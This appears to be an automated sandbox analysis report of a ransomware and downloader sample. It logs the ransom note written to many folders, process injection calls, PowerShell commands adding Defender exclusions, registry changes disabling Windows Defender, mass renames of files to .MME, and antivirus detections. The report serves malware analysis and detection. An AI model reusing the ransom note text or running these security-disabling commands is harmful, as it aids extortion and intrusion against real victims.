NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002b8 filepath: C:\MSOCache\All Users\{90120000-00A1-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000288 filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Groove.en-us\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000288 filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office.en-us\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002cc filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Office64.en-us\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x000002b8 filepath: C:\MSOCache\All Users\{90120000-0114-0412-0000-0000000FF1CE}-C\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000294 filepath: C:\MSOCache\All Users\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x0000012c filepath: C:\MSOCache\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000294 filepath: C:\PerfLogs\Admin\Read_Me.txt	1
NtWriteFile Oct. 22, 2021, 9:03 a.m.	buffer: Attention! All your files, documents, photos, databases and other important files are encrypted The only method of recovering files is to purchase an unique decryptor. Only we can give you this decryptor and only we can recover your files. The server with your decryptor is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- 1. Download Tor browser - https://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?101HJKMOPRT 5. and open ticket ---------------------------------------------------------------------------------------- Alternate communication channel here: https://yip.su/2QstD5 offset: 0 file_handle: 0x00000294 filepath: C:\PerfLogs\Read_Me.txt	1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2948 resumed a thread in remote process 2492
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000760 suspend_count: 1 process_identifier: 2492	1	0	0

Creates known SpyNet files, registry changes and/or mutexes. (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Spynet

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Zeus P2P (Banking Trojan) (17 events)

mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0002
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0003
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0001
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0006
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0007
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0004
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0005
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0008
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0009
mutex	Local\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0010
mutex	Local\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0011
udp	{u'src': u'192.168.56.101', u'dst': u'239.255.255.250', u'offset': 4477251, u'time': 1.3366329669952393, u'dport': 3702, u'sport': 49152}
udp	{u'src': u'192.168.56.101', u'dst': u'239.255.255.250', u'offset': 4489831, u'time': 5.91894006729126, u'dport': 3702, u'sport': 61480}
udp	{u'src': u'192.168.56.101', u'dst': u'239.255.255.250', u'offset': 4492687, u'time': 1.641977071762085, u'dport': 1900, u'sport': 62327}
udp	{u'src': u'192.168.56.101', u'dst': u'239.255.255.250', u'offset': 4498423, u'time': 1.7986888885498047, u'dport': 3702, u'sport': 62329}

Disables Windows Security features (4 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring

Executed a process and injected code into it, probably while unpacking (50 out of 51 events)

Time & API	Arguments	Status	Return
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000340 suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000598 suspend_count: 1 process_identifier: 2948	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8	1	0
NtSetContextThread Oct. 22, 2021, 9:03 a.m.	registers.eip: 1920740228 registers.esp: 3338292 registers.edi: 58111264 registers.eax: 3276849 registers.ebp: 3338296 registers.edx: 58709152 registers.ebx: 1023400 registers.esi: 724456 registers.ecx: 60755968 thread_handle: 0x000000e8 process_identifier: 2948	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2948	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2948	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2948	1	0
CreateProcessInternalW Oct. 22, 2021, 9:03 a.m.	thread_identifier: 2252 thread_handle: 0x000006a4 process_identifier: 2800 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006ac	1	1
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 2948	1	0
CreateProcessInternalW Oct. 22, 2021, 9:03 a.m.	thread_identifier: 596 thread_handle: 0x000006ac process_identifier: 2624 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006c0	1	1
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000006b0 suspend_count: 1 process_identifier: 2948	1	0
CreateProcessInternalW Oct. 22, 2021, 9:03 a.m.	thread_identifier: 2760 thread_handle: 0x000006bc process_identifier: 656 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\朓杆朓朏杓朊木朽朊朽朽朻朌朱朊\svchost.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000006dc	1	1
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000006cc suspend_count: 1 process_identifier: 2948	1	0
CreateProcessInternalW Oct. 22, 2021, 9:03 a.m.	thread_identifier: 1760 thread_handle: 0x00000728 process_identifier: 2572 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run filepath_r: C:\Users\test22\AppData\Local\Temp\49f01170-868e-4fa0-b0e0-7477ab9be03f\AdvancedRun.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000750	1	1
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x0000073c suspend_count: 1 process_identifier: 2948	1	0
CreateProcessInternalW Oct. 22, 2021, 9:03 a.m.	thread_identifier: 2612 thread_handle: 0x00000750 process_identifier: 3060 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\101.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000768	1	1
CreateProcessInternalW Oct. 22, 2021, 9:03 a.m.	thread_identifier: 2908 thread_handle: 0x0000075c process_identifier: 2552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\101.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x0000074c	1	1
NtUnmapViewOfSection Oct. 22, 2021, 9:03 a.m.	base_address: 0x00400000 region_size: 446464 process_identifier: 2552 process_handle: 0x0000074c		3221225497
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2552 region_size: 126976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000074c		3221225496
CreateProcessInternalW Oct. 22, 2021, 9:03 a.m.	thread_identifier: 1884 thread_handle: 0x00000760 process_identifier: 2492 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\101.exe filepath_r: stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x000001f8	1	1
NtUnmapViewOfSection Oct. 22, 2021, 9:03 a.m.	base_address: 0x00400000 region_size: 12976128 process_identifier: 2492 process_handle: 0x000001f8		3221225497
NtAllocateVirtualMemory Oct. 22, 2021, 9:03 a.m.	process_identifier: 2492 region_size: 126976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001f8	1	0
NtGetContextThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000760	1	0
NtSetContextThread Oct. 22, 2021, 9:03 a.m.	registers.eip: 2000355780 registers.esp: 3211060 registers.edi: 0 registers.eax: 4226208 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000760 process_identifier: 2492	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000760 suspend_count: 1 process_identifier: 2492	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000444 suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000004a4 suspend_count: 1 process_identifier: 2800	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000298 suspend_count: 1 process_identifier: 2624	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000002ec suspend_count: 1 process_identifier: 2624	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000448 suspend_count: 1 process_identifier: 2624	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000004a8 suspend_count: 1 process_identifier: 2624	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 656	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 656	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000454 suspend_count: 1 process_identifier: 656	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000004b4 suspend_count: 1 process_identifier: 656	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 3060	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x000002fc suspend_count: 1 process_identifier: 3060	1	0
NtResumeThread Oct. 22, 2021, 9:03 a.m.	thread_handle: 0x00000458 suspend_count: 1 process_identifier: 3060	1	0

File has been identified by 35 AntiVirus engines on VirusTotal as malicious (35 events)

Lionic	Trojan.Win32.Generic.4!c
McAfee	RDN/Generic Downloader.x
Sangfor	Trojan.Win32.Sabsik.FL
K7GW	Trojan-Downloader ( 005894341 )
Cyren	W32/MSIL_Kryptik.EHH.gen!Eldorado
ESET-NOD32	a variant of MSIL/TrojanDownloader.Agent.JEQ
APEX	Malicious
Paloalto	generic.ml
Cynet	Malicious (score: 100)
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Gen:Variant.MSILHeracles.29136
MicroWorld-eScan	Gen:Variant.MSILHeracles.29136
Avast	FileRepMalware
Ad-Aware	Gen:Variant.MSILHeracles.29136
Emsisoft	Gen:Variant.MSILHeracles.29136 (B)
Comodo	Malware@#1aylq9lprhj8a
F-Secure	Trojan.TR/Dldr.Agent.usjxq
DrWeb	Trojan.PackedNET.1053
McAfee-GW-Edition	Artemis!Trojan
FireEye	Gen:Variant.MSILHeracles.29136
SentinelOne	Static AI - Suspicious PE
GData	Gen:Variant.MSILHeracles.29136
Webroot	W32.Malware.Gen
Avira	TR/Dldr.Agent.usjxq
MAX	malware (ai score=86)
Arcabit	Trojan.MSILHeracles.D71D0
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Microsoft	Trojan:Win32/Woreflint.A!cl
Cylance	Unsafe
TrendMicro-HouseCall	TROJ_GEN.R002H0CJL21
Ikarus	Trojan-Downloader.MSIL.Agent
Fortinet	MSIL/Agent.JEQ!tr.dldr
AVG	FileRepMalware
CrowdStrike	win/malicious_confidence_60% (W)
MaxSecure	Trojan.Malware.300983.susgen

Performs 2377 file moves indicative of a ransomware file encryption process (50 out of 2377 events)

Time & API	Arguments	Status	Return
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms flags: 2 oldfilepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SHU3YAY00VEHOD5VG9YY.temp newfilepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms oldfilepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SHU3YAY00VEHOD5VG9YY.temp	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\Boot\BCD.LOG1.MME flags: 2 oldfilepath_r: \\?\M:\Boot\BCD.LOG1 newfilepath: M:\Boot\BCD.LOG1.MME oldfilepath: M:\Boot\BCD.LOG1	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.msi	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\Boot\BOOTSTAT.DAT.MME flags: 2 oldfilepath_r: \\?\M:\Boot\BOOTSTAT.DAT newfilepath: M:\Boot\BOOTSTAT.DAT.MME oldfilepath: M:\Boot\BOOTSTAT.DAT	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\cuckoo_2552.ini.MME flags: 2 oldfilepath_r: \\?\C:\cuckoo_2552.ini newfilepath: C:\cuckoo_2552.ini.MME oldfilepath: C:\cuckoo_2552.ini	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\M:\Boot\BCD.LOG2.MME flags: 2 oldfilepath_r: \\?\M:\Boot\BCD.LOG2 newfilepath: M:\Boot\BCD.LOG2.MME oldfilepath: M:\Boot\BCD.LOG2	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\GPKI\gpki.cer.MME flags: 2 oldfilepath_r: \\?\C:\GPKI\gpki.cer newfilepath: C:\GPKI\gpki.cer.MME oldfilepath: C:\GPKI\gpki.cer	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml newfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0016-0412-0000-0000000FF1CE}-C\Setup.xml	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PptLR.cab	1	1
MoveFileWithProgressW Oct. 22, 2021, 9:03 a.m.	newfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml.MME flags: 2 oldfilepath_r: \\?\C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml newfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml.MME oldfilepath: C:\MSOCache\All Users\{90120000-0018-0412-0000-0000000FF1CE}-C\PowerPointMUI.xml	1	1
